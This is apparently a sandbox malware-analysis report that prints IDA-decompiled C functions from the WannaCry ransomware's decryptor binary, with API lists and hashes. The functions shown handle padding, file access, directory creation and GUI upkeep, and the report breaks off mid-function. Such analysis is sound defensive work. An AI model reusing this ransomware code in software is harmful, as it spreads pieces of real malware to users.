                                                      • Opcode ID: 9867dcfa113bb228f6e7ce7fcc7c959ecb5fe08f48f21d4d20f526cefea80cd3
                                                      • Instruction ID: 62764616b0dad41b6f02366a4e891bd604a257d4ac44bdf0c04ae484a2ff6343
                                                      • Opcode Fuzzy Hash: 9867dcfa113bb228f6e7ce7fcc7c959ecb5fe08f48f21d4d20f526cefea80cd3
                                                      • Instruction Fuzzy Hash: 2F2108B620435067D620AB65EC81AEB779CEBC4324F44082EFD1892242E77D661D82FA
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 74%
                                                      			E0040D150(int __eax, intOrPtr* __ecx, void* __edi, char _a4, char _a8, char _a12, intOrPtr* _a16) {
                                                      				char _v500;
                                                      				intOrPtr _v508;
                                                      				char _v520;
                                                      				char _v521;
                                                      				char _v528;
                                                      				char _v529;
                                                      				intOrPtr _v536;
                                                      				signed int _t42;
                                                      				short _t46;
                                                      				signed int _t48;
                                                      				int _t62;
                                                      				intOrPtr* _t63;
                                                      				intOrPtr _t67;
                                                      				intOrPtr _t81;
                                                      				void* _t82;
                                                      				void* _t83;
                                                      				void* _t89;
                                                      				void* _t94;
                                                      				intOrPtr* _t95;
                                                      				void* _t97;
                                                      				void* _t99;
                                                      
                                                      				_t89 = __edi;
                                                      				_t63 = __ecx;
                                                      				_push(0);
                                                      				L0041303E();
                                                      				srand(__eax);
                                                      				_t99 =  &_v508 + 8;
                                                      				_t42 = rand();
                                                      				asm("cdq");
                                                      				_t94 = 0;
                                                      				_t81 = _t42 % 0xc8 + 0x1f;
                                                      				_v508 = _t81;
                                                      				if(_t81 > 0) {
                                                      					do {
                                                      						_t62 = rand();
                                                      						_t81 = _v508;
                                                      						 *(_t99 + _t94 + 0x14) = _t62;
                                                      						_t94 = _t94 + 1;
                                                      					} while (_t94 < _t81);
                                                      				}
                                                      				_t95 = _a16;
                                                      				_t97 = _t99 + _t81 - 0xb;
                                                      				if(_t95 != 0) {
                                                      					_push(_t89);
                                                      					memcpy(_t97, E0040D5C0(_t95), 7 << 2);
                                                      					_t99 = _t99 + 0xc;
                                                      					asm("movsw");
                                                      					asm("movsb");
                                                      					_t81 = _v508;
                                                      					_t95 = _a16;
                                                      				}
                                                      				 *((char*)(_t99 + _t81 + 0x14)) = _a4;
                                                      				_t82 = _t81 + 1;
                                                      				 *((char*)(_t99 + _t82 + 0x1c)) = _a8;
                                                      				_t83 = _t82 + 1;
                                                      				 *((char*)(_t99 + _t83 + 0x1c)) = _a12;
                                                      				_v508 = _t83 + 1;
                                                      				_t46 = E00412B00(_t97, 0x1f);
                                                      				_t67 = _v508;
                                                      				 *((short*)(_t99 + 8 + _t67 + 0x14)) = _t46;
                                                      				_t48 =  *((intOrPtr*)( *_t63 + 0x18))(2,  &_v500, _t67 + 2, 0);
                                                      				if(_t48 < 0) {
                                                      					L12:
                                                      					return _t48 | 0xffffffff;
                                                      				} else {
                                                      					E0040D5A0(_t63, _t97);
                                                      					_push( &_v528);
                                                      					_push( &_v520);
                                                      					_push( &_v521);
                                                      					_v528 = 0x1f4;
                                                      					if( *((intOrPtr*)( *_t63 + 0x1c))() < 0 || _v529 != 2) {
                                                      						_t48 =  *((intOrPtr*)( *_t63 + 0xc))();
                                                      						goto L12;
                                                      					} else {
                                                      						if(_t95 == 0) {
                                                      							L10:
                                                      							return 0;
                                                      						} else {
                                                      							_push(1);
                                                      							_push(_v536);
                                                      							_push( &_v528);
                                                      							_push(2);
                                                      							if( *((intOrPtr*)( *_t95 + 0x18))() == 0) {
                                                      								goto L10;
                                                      							} else {
                                                      								return  *((intOrPtr*)( *_t63 + 0xc))() | 0xffffffff;
                                                      							}
                                                      						}
                                                      					}
                                                      				}
                                                      			}

























                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000001C.00000002.4450384819.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000001C.00000002.4450341169.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450550901.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450641363.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450693015.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450741084.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_28_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: rand$srandtime
                                                      • String ID:
                                                      • API String ID: 1946231456-0
                                                      • Opcode ID: aeda45b4266ec6acd211240a262b9f529a391165e32c1a7dc214254ed02393b1
                                                      • Instruction ID: 99a3411600cb7ade80f66248b35b99165d2bae15bbb14ca3cd699ef114e4807e
                                                      • Opcode Fuzzy Hash: aeda45b4266ec6acd211240a262b9f529a391165e32c1a7dc214254ed02393b1
                                                      • Instruction Fuzzy Hash: 6E411231A083454BD314DE69D885BABFBD4AFD4710F04893EE885973C2DA78D94987E3
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 97%
                                                      			E004108A0(CHAR* _a4, intOrPtr _a8, char _a12, long* _a16) {
                                                      				long _t28;
                                                      				signed int _t38;
                                                      				void* _t44;
                                                      				long* _t45;
                                                      				long _t46;
                                                      				char _t47;
                                                      
                                                      				_t47 = _a12;
                                                      				if(_t47 == 1 || _t47 == 2 || _t47 == 3) {
                                                      					_t45 = _a16;
                                                      					_t44 = 0;
                                                      					_t38 = 0;
                                                      					 *_t45 = 0;
                                                      					_a12 = 0;
                                                      					if(_t47 == 1) {
                                                      						_t44 = _a4;
                                                      						_a12 = 0;
                                                      						goto L10;
                                                      					} else {
                                                      						if(_t47 != 2) {
                                                      							L11:
                                                      							_push(0x20);
                                                      							L00412CEC();
                                                      							_t46 = _t28;
                                                      							if(_t47 == 1 || _t47 == 2) {
                                                      								 *_t46 = 1;
                                                      								 *((char*)(_t46 + 0x10)) = _a12;
                                                      								 *(_t46 + 1) = _t38;
                                                      								 *(_t46 + 4) = _t44;
                                                      								 *((char*)(_t46 + 8)) = 0;
                                                      								 *(_t46 + 0xc) = 0;
                                                      								if(_t38 != 0) {
                                                      									 *(_t46 + 0xc) = SetFilePointer(_t44, 0, 0, 1);
                                                      								}
                                                      								 *_a16 = 0;
                                                      								return _t46;
                                                      							} else {
                                                      								 *((intOrPtr*)(_t46 + 0x14)) = _a4;
                                                      								 *((intOrPtr*)(_t46 + 0x18)) = _a8;
                                                      								 *_t46 = 0;
                                                      								 *(_t46 + 1) = 1;
                                                      								 *((char*)(_t46 + 0x10)) = 0;
                                                      								 *((intOrPtr*)(_t46 + 0x1c)) = 0;
                                                      								 *(_t46 + 0xc) = 0;
                                                      								 *_a16 = 0;
                                                      								return _t46;
                                                      							}
                                                      						} else {
                                                      							_t44 = CreateFileA(_a4, 0x80000000, 1, 0, 3, 0x80, 0);
                                                      							if(_t44 != 0xffffffff) {
                                                      								_a12 = 1;
                                                      								L10:
                                                      								_t28 = SetFilePointer(_t44, 0, 0, 1);
                                                      								_t38 = _t38 & 0xffffff00 | _t28 != 0xffffffff;
                                                      								goto L11;
                                                      							} else {
                                                      								 *_t45 = 0x200;
                                                      								return 0;
                                                      							}
                                                      						}
                                                      					}
                                                      				} else {
                                                      					 *_a16 = 0x10000;
                                                      					return 0;
                                                      				}
                                                      			}










                                                      APIs
                                                      • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,FFFFFFFF,?,00000000,?,00411CAF,?,?,FFFFFFFF,?), ref: 004108FB
                                                      • SetFilePointer.KERNEL32(?,00000000,00000000,00000001,FFFFFFFF,?,00000000,?,00411CAF,?,?,FFFFFFFF,?), ref: 0041092C
                                                      • #823.MFC42(00000020,?,00411CAF,?,?,FFFFFFFF,?), ref: 0041093A
                                                      • SetFilePointer.KERNEL32(?,00000000,00000000,00000001,?,?), ref: 004109A2
                                                      Memory Dump Source
                                                      • Source File: 0000001C.00000002.4450384819.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000001C.00000002.4450341169.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450550901.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450641363.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450693015.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450741084.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_28_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: File$Pointer$#823Create
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 92%
                                                      			E00412250(CHAR* _a4, void* _a8) {
                                                      				void _v260;
                                                      				char _v520;
                                                      				long _t16;
                                                      				void* _t17;
                                                      				void* _t29;
                                                      				CHAR* _t32;
                                                      				signed int _t33;
                                                      				signed int _t34;
                                                      				signed int _t36;
                                                      				signed int _t39;
                                                      				unsigned int _t46;
                                                      				signed int _t47;
                                                      				signed int _t51;
                                                      				signed int _t52;
                                                      				void* _t56;
                                                      				void* _t83;
                                                      				void* _t85;
                                                      				void* _t86;
                                                      				void* _t87;
                                                      				char* _t88;
                                                      				char* _t93;
                                                      
                                                      				_t88 =  &_v520;
                                                      				_t32 = _a4;
                                                      				if(_t32 != 0) {
                                                      					_t16 = GetFileAttributesA(_t32);
                                                      					if(_t16 == 0xffffffff) {
                                                      						_t16 = CreateDirectoryA(_t32, 0);
                                                      					}
                                                      				}
                                                      				_t87 = _a8;
                                                      				_t34 =  *_t87;
                                                      				if(_t34 == 0) {
                                                      					L15:
                                                      					return _t16;
                                                      				} else {
                                                      					_t17 = _t87;
                                                      					_t56 = _t87;
                                                      					do {
                                                      						if(_t34 == 0x2f || _t34 == 0x5c) {
                                                      							_t17 = _t56;
                                                      						}
                                                      						_t34 =  *(_t56 + 1);
                                                      						_t56 = _t56 + 1;
                                                      					} while (_t34 != 0);
                                                      					if(_t17 != _t87) {
                                                      						_t86 = _t87;
                                                      						_t51 = _t17 - _t87;
                                                      						_t52 = _t51 >> 2;
                                                      						memcpy( &_v260, _t86, _t52 << 2);
                                                      						_t29 = memcpy(_t86 + _t52 + _t52, _t86, _t51 & 0x00000003);
                                                      						_t93 =  &(_t88[0x18]);
                                                      						_t34 = 0;
                                                      						_t93[_t29 + 0x114] = 0;
                                                      						E00412250(_t32,  &_v260);
                                                      						_t88 =  &(_t93[8]);
                                                      					}
                                                      					_v520 = 0;
                                                      					if(_t32 != 0) {
                                                      						asm("repne scasb");
                                                      						_t46 =  !(_t34 | 0xffffffff);
                                                      						_t85 = _t32 - _t46;
                                                      						_t47 = _t46 >> 2;
                                                      						memcpy(_t85 + _t47 + _t47, _t85, memcpy( &_v520, _t85, _t47 << 2) & 0x00000003);
                                                      						_t88 =  &(_t88[0x18]);
                                                      						_t34 = 0;
                                                      					}
                                                      					asm("repne scasb");
                                                      					_t36 =  !(_t34 | 0xffffffff);
                                                      					_t83 = _t87 - _t36;
                                                      					_t33 = _t36;
                                                      					asm("repne scasb");
                                                      					_t39 = _t33 >> 2;
                                                      					memcpy( &_v520 - 1, _t83, _t39 << 2);
                                                      					memcpy(_t83 + _t39 + _t39, _t83, _t33 & 0x00000003);
                                                      					_t16 = GetFileAttributesA( &_v520);
                                                      					if(_t16 != 0xffffffff) {
                                                      						goto L15;
                                                      					} else {
                                                      						return CreateDirectoryA( &_v520, 0);
                                                      					}
                                                      				}
                                                      			}

























                                                      APIs
                                                      • GetFileAttributesA.KERNEL32(?,?,?), ref: 00412264
                                                      • CreateDirectoryA.KERNEL32(?,00000000), ref: 00412272
                                                      • GetFileAttributesA.KERNEL32(00000000), ref: 00412338
                                                      • CreateDirectoryA.KERNEL32(?,00000000,?,?), ref: 0041234C
                                                      Memory Dump Source
                                                      • Source File: 0000001C.00000002.4450384819.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000001C.00000002.4450341169.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450550901.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450641363.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450693015.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450741084.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_28_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AttributesCreateDirectoryFile
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 80%
                                                      			E00406A00(void* __ecx, intOrPtr* _a4, intOrPtr _a8, signed int _a12) {
                                                      				void* _t15;
                                                      				signed int _t23;
                                                      				intOrPtr* _t33;
                                                      				void* _t34;
                                                      
                                                      				_t23 = _a12;
                                                      				_t33 = _a4;
                                                      				_push(_t23);
                                                      				_push(_a8);
                                                      				_t34 = __ecx;
                                                      				_push(_t33);
                                                      				L00412D6A();
                                                      				if(_t23 > 6) {
                                                      					L12:
                                                      					return _t15;
                                                      				} else {
                                                      					switch( *((intOrPtr*)(_t23 * 4 +  &M00406ABC))) {
                                                      						case 0:
                                                      							_push( *((intOrPtr*)(__ecx + 0x824)));
                                                      							_t17 =  *((intOrPtr*)( *_t33 + 0x34))();
                                                      							L00412D64();
                                                      							if(_t17 == 0x402) {
                                                      								L6:
                                                      								_push(0xe0e0);
                                                      								 *((intOrPtr*)( *_t33 + 0x38))();
                                                      							} else {
                                                      								L00412D64();
                                                      								if(_t17 == 0x3fe) {
                                                      									goto L6;
                                                      								} else {
                                                      									L00412D64();
                                                      									if(_t17 == 0x3fb) {
                                                      										goto L6;
                                                      									} else {
                                                      										_push(0xffffff);
                                                      										 *((intOrPtr*)( *_t33 + 0x38))();
                                                      									}
                                                      								}
                                                      							}
                                                      							_t35 =  *((intOrPtr*)(_t34 + 0x828));
                                                      							if(_t35 != 0) {
                                                      								goto L11;
                                                      							}
                                                      							return 0;
                                                      							goto L13;
                                                      						case 1:
                                                      							goto L12;
                                                      						case 2:
                                                      							_push( *((intOrPtr*)(__esi + 0x824)));
                                                      							__ecx = __edi;
                                                      							 *((intOrPtr*)( *__edi + 0x34))();
                                                      							if(__esi != 0) {
                                                      								L11:
                                                      								return  *((intOrPtr*)(_t35 + 4));
                                                      							}
                                                      							return 0;
                                                      							goto L13;
                                                      					}
                                                      				}
                                                      				L13:
                                                      			}








                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000001C.00000002.4450384819.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000001C.00000002.4450341169.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450550901.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450641363.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450693015.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450741084.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_28_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #3089$#4476
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 91%
                                                      			E0040D0A0(int __eax, intOrPtr* __ecx, char _a4, char _a8) {
                                                      				char _v500;
                                                      				signed int _t22;
                                                      				signed int _t27;
                                                      				intOrPtr* _t32;
                                                      				void* _t40;
                                                      				void* _t43;
                                                      				void* _t44;
                                                      				void* _t45;
                                                      				void* _t46;
                                                      				void* _t49;
                                                      
                                                      				_t32 = __ecx;
                                                      				_push(0);
                                                      				L0041303E();
                                                      				srand(__eax);
                                                      				_t49 =  &_v500 + 8;
                                                      				_t22 = rand();
                                                      				asm("cdq");
                                                      				_t40 = 0;
                                                      				_t43 = _t22 % 0xc8 + 0x1f;
                                                      				if(_t43 <= 0) {
                                                      					L2:
                                                      					_t41 = _t49 + _t43 - 0x13;
                                                      					 *((char*)(_t49 + _t43 + 0xc)) = _a4;
                                                      					_t44 = _t43 + 1;
                                                      					 *((char*)(_t49 + _t44 + 0x14)) = 0;
                                                      					_t45 = _t44 + 1;
                                                      					 *((char*)(_t49 + _t45 + 0x14)) = _a8;
                                                      					_t46 = _t45 + 1;
                                                      					 *((short*)(_t49 + 8 + _t46 + 0xc)) = E00412B00(_t49 + _t43 - 0x13, 0x1f);
                                                      					_t27 =  *((intOrPtr*)( *_t32 + 0x18))(2,  &_v500, _t46 + 2, 0);
                                                      					if(_t27 >= 0) {
                                                      						E0040D5A0(_t32, _t41);
                                                      						return 0;
                                                      					} else {
                                                      						return _t27 | 0xffffffff;
                                                      					}
                                                      				} else {
                                                      					goto L1;
                                                      				}
                                                      				do {
                                                      					L1:
                                                      					 *((char*)(_t49 + _t40 + 0xc)) = rand();
                                                      					_t40 = _t40 + 1;
                                                      				} while (_t40 < _t43);
                                                      				goto L2;
                                                      			}














                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000001C.00000002.4450384819.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000001C.00000002.4450341169.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450550901.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450641363.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450693015.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450741084.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_28_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: rand$srandtime
                                                      • String ID:
                                                      • API String ID: 1946231456-0
                                                      • Opcode ID: bbdcb1e1a24d480e02c6f3989001f72fd3822a1270c55b374a5c1adf4e9cf230
                                                      • Instruction ID: 418ba94e1263f5c278544cd72932f8c5cb06cad23ebf9749a5f73f3a0ac0752c
                                                      • Opcode Fuzzy Hash: bbdcb1e1a24d480e02c6f3989001f72fd3822a1270c55b374a5c1adf4e9cf230
                                                      • Instruction Fuzzy Hash: CB113D3164935106D3207A2A6C02BAFAB949FE1728F04493FE9D9962C2C46C894E83F7
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 71%
                                                      			E00405180(void* __ecx, intOrPtr _a4) {
                                                      				intOrPtr _t10;
                                                      				intOrPtr _t19;
                                                      				void* _t26;
                                                      
                                                      				_t19 = _a4;
                                                      				_t26 = __ecx;
                                                      				_t10 =  *((intOrPtr*)(__ecx + 0x44));
                                                      				__imp___mbscmp(_t10, _t19);
                                                      				if(_t10 == 0) {
                                                      					return _t10;
                                                      				} else {
                                                      					_push(_t19);
                                                      					L00412DA0();
                                                      					 *((char*)(__ecx + 0x48)) = 1;
                                                      					if( *((intOrPtr*)(__ecx + 0x74)) == 0) {
                                                      						E00405800(__ecx, 0);
                                                      					}
                                                      					if( *((intOrPtr*)(_t26 + 0x70)) == 0) {
                                                      						E00405820(_t26, 0);
                                                      					}
                                                      					if( *((intOrPtr*)(_t26 + 0x49)) == 0) {
                                                      						return InvalidateRect( *(_t26 + 0x20), 0, 1);
                                                      					}
                                                      					return RedrawWindow( *(_t26 + 0x20), 0, 0, 0x121);
                                                      				}
                                                      			}







                                                      APIs
                                                      • _mbscmp.MSVCRT ref: 00405191
                                                      • #860.MFC42(?), ref: 004051A1
                                                      • RedrawWindow.USER32(?,00000000,00000000,00000121), ref: 004051DE
                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 004051F2
                                                      Memory Dump Source
                                                      • Source File: 0000001C.00000002.4450384819.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000001C.00000002.4450341169.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450550901.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450641363.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450693015.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450741084.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_28_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #860InvalidateRectRedrawWindow_mbscmp
                                                      • String ID:
                                                      • API String ID: 497622568-0
                                                      • Opcode ID: 4aae586b1cfc2d6b37c47d983e66569639a31ec6a673fed4d94bf49cd6230326
                                                      • Instruction ID: cf498a414c54833703d22adddad9dcc08bc55e2fe29af9a848031684a7c2f2b5
                                                      • Opcode Fuzzy Hash: 4aae586b1cfc2d6b37c47d983e66569639a31ec6a673fed4d94bf49cd6230326
                                                      • Instruction Fuzzy Hash: 7B01D871700B00A7D6209765DC59FDBB7E9EF98702F00442EF746EB2C0C675E4018B68
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 82%
                                                      			E00412A00(intOrPtr* _a4) {
                                                      				intOrPtr _t9;
                                                      				intOrPtr _t10;
                                                      				intOrPtr* _t14;
                                                      				intOrPtr _t16;
                                                      				void* _t18;
                                                      
                                                      				_t14 = _a4;
                                                      				if(_t14 != 0) {
                                                      					if( *_t14 == 1) {
                                                      						_t2 = _t14 + 4; // 0x5d5e5f01
                                                      						_t16 =  *_t2;
                                                      						 *0x4220dc = E004127A0(_t16);
                                                      						if(_t16 != 0) {
                                                      							_t9 =  *((intOrPtr*)(_t16 + 0x138));
                                                      							if(_t9 != 0) {
                                                      								_push(_t9);
                                                      								L00412C98();
                                                      								_t18 = _t18 + 4;
                                                      							}
                                                      							_t10 =  *((intOrPtr*)(_t16 + 0x13c));
                                                      							 *((intOrPtr*)(_t16 + 0x138)) = 0;
                                                      							if(_t10 != 0) {
                                                      								_push(_t10);
                                                      								L00412C98();
                                                      								_t18 = _t18 + 4;
                                                      							}
                                                      							_push(_t16);
                                                      							 *((intOrPtr*)(_t16 + 0x13c)) = 0;
                                                      							L00412C98();
                                                      							_t18 = _t18 + 4;
                                                      						}
                                                      						_push(_t14);
                                                      						L00412C98();
                                                      						return  *0x4220dc;
                                                      					} else {
                                                      						 *0x4220dc = 0x80000;
                                                      						return 0x80000;
                                                      					}
                                                      				} else {
                                                      					 *0x4220dc = 0x10000;
                                                      					return 0x10000;
                                                      				}
                                                      			}









                                                      Memory Dump Source
                                                      • Source File: 0000001C.00000002.4450384819.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000001C.00000002.4450341169.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450550901.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450641363.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450693015.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450741084.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_28_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 8c2876bc683c79bd0f77c5504c849a1db55fe951b0604bd7b402bcddc95cd4ad
                                                      • Instruction ID: 94773d8abf21b8992377dbaff6472308c4204eb390e4227f2b12783aedecbb61
                                                      • Opcode Fuzzy Hash: 8c2876bc683c79bd0f77c5504c849a1db55fe951b0604bd7b402bcddc95cd4ad
                                                      • Instruction Fuzzy Hash: 070121B16016109BDA209F29EA417CBB3989F40354F08443BE545D7310F7F8E9E5CB99
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000001C.00000002.4450384819.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000001C.00000002.4450341169.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450550901.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450641363.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450693015.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450741084.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_28_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: closesocketsendsetsockoptshutdown
                                                      • String ID:
                                                      • API String ID: 4063721217-0
                                                      • Opcode ID: b8ea9e4fb017428832e7fdcfab5aceec40e53c9ca13a03ff53aa9a0524c23656
                                                      • Instruction ID: 511c5ca045328faec3d78f5435f76df0282562355462c5d2c83a81ecee0c9610
                                                      • Opcode Fuzzy Hash: b8ea9e4fb017428832e7fdcfab5aceec40e53c9ca13a03ff53aa9a0524c23656
                                                      • Instruction Fuzzy Hash: 9D014075200B40ABD3208B28C849B97B7A5AF89721F808B2CF6A9962D0D7B4A4088795
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 79%
                                                      			E00404430(intOrPtr __ecx, char _a8) {
                                                      				intOrPtr _v8;
                                                      				intOrPtr _v12;
                                                      				char _v16;
                                                      				intOrPtr _t13;
                                                      				struct HICON__* _t16;
                                                      				struct HICON__* _t17;
                                                      				intOrPtr _t26;
                                                      
                                                      				_t26 = __ecx;
                                                      				_t13 =  *((intOrPtr*)(__ecx + 0x59));
                                                      				if(_t13 != 0) {
                                                      					if( *((intOrPtr*)(__ecx + 0x5a)) == 0) {
                                                      						E00404530(__ecx);
                                                      					}
                                                      					if(E004045E0(_t26,  &_a8) == 0) {
                                                      						_t16 =  *(_t26 + 0x60);
                                                      					} else {
                                                      						_t16 =  *(_t26 + 0x5c);
                                                      					}
                                                      					_t17 = SetCursor(_t16);
                                                      					L00412CBC();
                                                      					return _t17;
                                                      				} else {
                                                      					_v16 = 0x10;
                                                      					if(__ecx != 0) {
                                                      						_t13 =  *((intOrPtr*)(__ecx + 0x20));
                                                      						_v8 = _t13;
                                                      					} else {
                                                      						_v8 = __ecx;
                                                      					}
                                                      					_v12 = 2;
                                                      					__imp___TrackMouseEvent( &_v16);
                                                      					 *((char*)(_t26 + 0x59)) = 1;
                                                      					L00412CBC();
                                                      					return _t13;
                                                      				}
                                                      			}











                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000001C.00000002.4450384819.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000001C.00000002.4450341169.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450550901.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450641363.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450693015.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450741084.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_28_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #2379$CursorEventMouseTrack
                                                      • String ID:
                                                      • API String ID: 2186836335-0
                                                      • Opcode ID: 8cae4badaefa13b91853eadf55a8840a780c3bb417d72a3b214d508dff938200
                                                      • Instruction ID: d4ee5e4a134dc88e0fb0520758ee2c50d42c0b6297011b3ab606eb820e3435c7
                                                      • Opcode Fuzzy Hash: 8cae4badaefa13b91853eadf55a8840a780c3bb417d72a3b214d508dff938200
                                                      • Instruction Fuzzy Hash: 1501B5B46047209BC714EF1895047EFBBD46FC4718F40881EEAC557382E6B898058B99
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 85%
                                                      			E00404CF0(intOrPtr __ecx) {
                                                      				char _v4;
                                                      				intOrPtr _v12;
                                                      				intOrPtr* _v16;
                                                      				intOrPtr _v20;
                                                      				intOrPtr _t13;
                                                      				intOrPtr* _t21;
                                                      				intOrPtr* _t22;
                                                      				intOrPtr _t27;
                                                      
                                                      				_push(0xffffffff);
                                                      				_push(E0041384E);
                                                      				_t13 =  *[fs:0x0];
                                                      				_push(_t13);
                                                      				 *[fs:0x0] = _t27;
                                                      				_v20 = __ecx;
                                                      				_v4 = 0;
                                                      				_t21 = __ecx + 0x70;
